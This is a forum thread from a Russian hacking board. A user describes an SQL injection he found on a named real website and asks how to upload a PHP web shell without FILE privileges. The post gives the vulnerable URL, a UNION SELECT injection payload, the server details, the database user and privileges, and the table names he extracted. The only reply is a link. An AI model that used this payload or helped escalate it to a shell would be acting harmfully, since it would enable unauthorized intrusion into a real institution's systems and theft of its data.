SQL INJ - неясно , можно ли впихнуть свой код/файл

Discussion in 'Песочница' started by khvdaiver, 3 Feb 2013.

Thread Status:
Not open for further replies.
  1. khvdaiver

    khvdaiver New Member

    Joined:
    29 Oct 2012
    Messages:
    79
    Likes Received:
    2
    Reputations:
    0
    (модерам: не нашел тему о помощи - повесил пост в общем потоке. если что не так - исправте, пожалуйста)

    Приветствую, атничатовцы!)
    Такая проблема.
    Есть сайт со скулей. Есть доступ к information_schema. Нашел выводимые поля => достал имена таблиц и имена полей. Осталось за малым - залить шелл (пых).
    Проблемы: права USAGE, ко некотрымтабилцам нет доступа даже на SELECT, не могу залить шелл OUTFILE/DUMPFILE'ом, т.к нет прав FILE. =( Не могу добиться вывода шелла каким-нибудь энкодом символов (в выводимое поле), не выходит никак. Не могли бы помочь в этом деле? Может быть, какие-нибуь идейки? или решения? Буду очень благодарен.

    Данные:
    injection: ttp://hiik.ru/'/
    выводимые поля: ttp://www.hiik.ru/1=1'%20union%20select%201,2,3%20--%20'3/
    server: windows server 2003
    ***предположительно, всё болтается на IIS/PHP + какие-то перловские шаманства***
    mysql_db: rasp
    mysql_user: rasp
    privilegies: USAGE (хотя, лучше всё равно всё рповерить)
    доступ к information schema: ЕСТЬ

    имена таблиц:
    CHARACTER_SETS
    COLLATIONS
    COLLATION_CHARACTER_SET_APPLICABILITY
    COLUMNS
    COLUMN_PRIVILEGES
    ENGINES
    EVENTS
    FILES
    GLOBAL_STATUS
    GLOBAL_VARIABLES
    KEY_COLUMN_USAGE
    PARTITIONS
    PLUGINS
    PROCESSLIST
    PROFILING
    REFERENTIAL_CONSTRAINTS
    ROUTINES
    SCHEMATA
    SCHEMA_PRIVILEGES
    SESSION_STATUS
    SESSION_VARIABLES
    STATISTICS
    TABLES
    TABLE_CONSTRAINTS
    TABLE_PRIVILEGES
    TRIGGERS
    USER_PRIVILEGES
    VIEWS
    audit
    den
    doljn
    fakult
    forms
    isprav
    kabinet
    kafedry
    kol_zayav
    kppk_data
    kppk_glav_prog
    kppk_kursy
    kppk_predp
    kppk_prepod
    kppk_program
    kppk_raspis
    kppk_slush
    kppk_soot
    kppk_svod
    mesto
    nagruzka
    news
    para
    podgot_kurs
    podraz
    predmet
    prepod
    raspis
    site
    spec
    structur
    tel
    telef
    tree_oplata11
    type_zan
    uch_plan
    uch_rasp_ex
    user
    zvan
     
  2. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,788
    Likes Received:
    872
    Reputations:
    859
    http://forum.antichat.ru/threadedpost3413385.html
     
    _________________________
Loading...
Similar Threads - неясно впихнуть файл
  1. 3nvY
    Replies:
    1
    Views:
    818
  2. Okzay
    Replies:
    0
    Views:
    2,252
  3. topmet
    Replies:
    3
    Views:
    3,131
Thread Status:
Not open for further replies.